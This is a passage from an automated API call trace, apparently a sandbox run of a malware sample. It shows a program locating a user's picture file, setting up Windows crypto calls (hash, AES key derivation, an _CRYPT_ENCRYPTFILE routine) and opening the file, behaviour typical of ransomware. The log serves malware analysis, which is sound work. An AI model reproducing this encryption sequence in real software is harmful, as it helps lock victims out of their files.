lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\qiez.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.800] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.800] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.800] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.800] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.800] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.800] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.800] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.800] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.800] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac9aec00, ftCreationTime.dwHighDateTime=0x1d5dea2, ftLastAccessTime.dwLowDateTime=0x35a7ad10, ftLastAccessTime.dwHighDateTime=0x1d5e585, ftLastWriteTime.dwLowDateTime=0x35a7ad10, ftLastWriteTime.dwHighDateTime=0x1d5e585, nFileSizeHigh=0x0, nFileSizeLow=0x18b97, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="qiez.png", cAlternateFileName="")) returned 0x90ae18 [0189.801] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.801] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.801] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.801] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.801] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0189.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.801] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.802] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.802] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.802] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.802] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.802] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0189.802] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.802] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0189.803] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.803] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.803] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.803] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.803] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.803] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.814] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.814] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.814] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.815] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.815] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.815] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.815] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.815] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.815] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.815] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.815] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.815] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.816] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.816] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.816] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.816] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.816] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.816] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.817] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.817] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.817] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.817] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.817] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.817] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.817] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0189.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.818] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0189.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.818] CryptDestroyHash (hHash=0x90af58) returned 1 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0189.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.819] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0189.819] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.819] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.819] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0189.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qiez.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.820] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.820] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 